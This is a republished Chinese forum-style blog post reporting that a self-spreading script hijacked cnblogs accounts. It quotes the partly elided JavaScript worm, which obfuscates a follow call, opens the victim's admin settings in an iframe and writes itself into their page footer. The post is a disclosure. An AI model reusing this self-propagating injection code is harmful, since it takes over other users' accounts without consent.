博客园被黑了?
(抱歉占用首页一会儿)
是博客园被黑了还是只有我的博客被黑了?
刚发现我的博客被加入了下面的代码(出现在“管理->设置->页脚Html代码”里,其中一部分被我略去),有没有人遇到一样的情况?请管理员帮忙查一下。
这段代码在我这儿运行以后的效果是自动关注Darrel.Hsu的博客(链接是资料页没有恶意代码,博客有恶意代码,不要在登录状态下访问),到现在这个博客已经增加了几百粉丝(23:44有554粉丝,24:00时有565粉丝)。
Update: 可能是有某位注册用户在自己博客里加了这段代码,然后凡是处于登录状态下的园友访问这个用户的博客后都会被感染;如果处于未登录状态,则跳回到登录页,结果是博客里的所有文章都无法正常打开。
被加入的代码如下:
<script>function hack(){ var id = "D_Hacker" + parseInt( Math.random() * 1000 ); function createIframe( src , cb ){ var iframe ; if( ! ( iframe = document.getElementById( id ) ) ){ ...//略 } iframe.onload = function(){ cb( iframe ) } ; if( src.indexOf("http") == 0 ){ iframe.src = src ; }else{ var doc = iframe.contentWindow.document; doc.open(); doc.write( src ); doc.close(); } } var m = ["c", "n", "b", "l", "o", "g", "s", ".", "U", "s", "e", "r", "M", "a", "n", "a", "g", "e", "r", ".", "F", "o", "l", "l", "o", "w", "B", "l", "o", "g", "g", "e", "r"] m = m.join("") window.eval( m + '("b8a15066-1039-e011-ac81-842b2b196315")') createIframe("http://www.cnblogs.com/",function( iframe ){ var win = iframe.contentWindow; var href = $("#span_userinfo a:eq(1)", win.document ); href = href.attr("href") + "admin/Configure.aspx"; createIframe( href , function( iframe ){ ...//略 if( val.indexOf("b8a15066()") < 0 ){ val = val + "<scri"+"pt>"+ hack.toString() +";hack();</scr" +"ipt>"; $("#Edit_txbPageEndHtml",doc).val( val ); $("#Edit_lkbPost" , doc ).trigger("click"); } }); }) };hack();</script>
本文转自博客园八进制的博客,原文链接:博客园被黑了?,如需转载请自行联系原博主。
